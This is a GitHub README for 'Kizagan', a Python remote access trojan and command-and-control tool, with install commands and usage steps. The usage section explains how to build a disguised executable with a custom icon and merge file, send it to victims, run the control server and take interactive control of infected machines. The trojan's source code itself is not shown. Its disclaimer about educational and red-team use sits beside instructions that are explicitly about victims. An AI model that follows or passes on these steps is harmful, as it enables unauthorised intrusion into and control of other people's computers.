st4inl3s5 / kizagan

KIZAGAN is a RAT,c2 command&control tool.It allows you to build executables and control infected machines.
MIT License
85 stars 19 forks source link
backdoor c2 command-control hack hacking hacking-tool hacking-tools kizagan python python-script rat remote-access-trojan-tool script trojan trojan-rat

KIZAGAN

Kizagan is a RAT,C2 tool built with python.Kizagan can build executables and control infected machines.

a

Features

FEAUTURES TO DO

SETUP

Clone the project or download the zip file and extract it.

git clone https://github.com/st4inl3s5/kizagan

To make setup, use the following command :

pip install -r requirements.txt

USAGE

Build an executable file with following command :

python3 kizagan.py build -ip <control_server_ip> -p <control_server_port> -i <your_icon_file> -m <your_merge_file> -n <executable_name>

1

2

3

4

Send the executable file to victims.

Start the control server with following command :

python3 kizagan.py control -ip <control_server_ip> -p <control_server_port>

5

6

Wait for the victims to open your executable.When a victims open your executable, victims will appear in terminal :

7

Press CTRL+C to interact with a victim :

8

Type 'help' to view help menu.

9

MOTIVATION

"Buy Me A Coffee"

My motivation to develop kizagan, your donations, improve my cyber and software knowledge.

DISCLAIMER

This tool developed for educational and red team purposes.Don't use this tool for illegal purposes.I am not responsible for illegal actions.

So the kizagan under development, it can have bugs.Please report me the bugs you find.

CONTACT

https://www.instagram.com/arduinocum.py/

https://t.me/+5XoMhXv4SghhYmE0